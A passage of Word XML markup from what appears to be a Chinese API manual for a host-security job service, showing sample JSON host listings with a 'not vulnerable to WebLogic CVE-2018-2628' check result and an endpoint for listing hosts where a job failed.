          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"localhost.localdomain"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.hasDeleted"</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_trimmed_field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host.agentStatus"</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host.displayIp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"192.168.167.132"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"data.ip"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"127.0.0.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ata.vuln"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"不存在weblogic CVE-2018-2628 反序列化漏洞"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.ip"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"172.16.5.102"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.hostTagLis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host.assetLevel"</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data.port"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"7001"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.agentId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"3bf67e5c8d8e1865"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.hostname"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"zbx.qingteng.cn"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.hasDeleted"</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_trimmed_field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host.agentStatus"</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host.displayIp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"172.16.5.102"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"data.ip"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"127.0.0.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ata.vuln"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"不存在weblogic CVE-2018-2628 反序列化漏洞"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.ip"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"192.168.146.136"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.hostTagLis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host.assetLevel"</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data.port"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"7001"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.agentId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"82f68fb82ce4d865"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.hostname"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"localhost"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.hasDeleted"</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_trimmed_field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host.agentStatus"</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host.displayIp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"192.168.146.136"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"data.ip"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"127.0.0.1"</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total"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756AF230" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rows字段说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DA1054" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>rows 为List&lt;Map&gt; 类型, 字段名可以根据fields中获取到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B127C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="204" w:name="查看失败主机"/>
      <w:bookmarkEnd w:id="203"/>
      <w:r>
        <w:t>查看失败主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014FDF27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7030972F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/fastjob/job/task/error/{taskRecordId}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1324D2E0"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452"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="2311"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="75A93A5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6BA9081" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E465006" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A78C1A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="31F5515C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="782F26CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskRecordId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43F00CD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B297EE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业的task执行记录id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B3F052C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB63F27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/fastjob/job/task/error/5d1d61c423e46813eb98f514</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A190AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163786E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"row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id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11f50b25d891243fb540c8"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"agentId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"acd675759d37d865"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"displayIp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"192.168.135.132"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"internalIp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"192.168.135.132"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"externalIp"</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hostName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"localhost.localdomain"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"group"</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groupName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"未分组主机"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"remark"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"server组"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"hostTags"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"server-4"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</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error"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"主机不在线"</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1f50c25d891243fb540c9"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"agentId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"034a6e7b17558865"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"displayIp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"172.20.0.1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
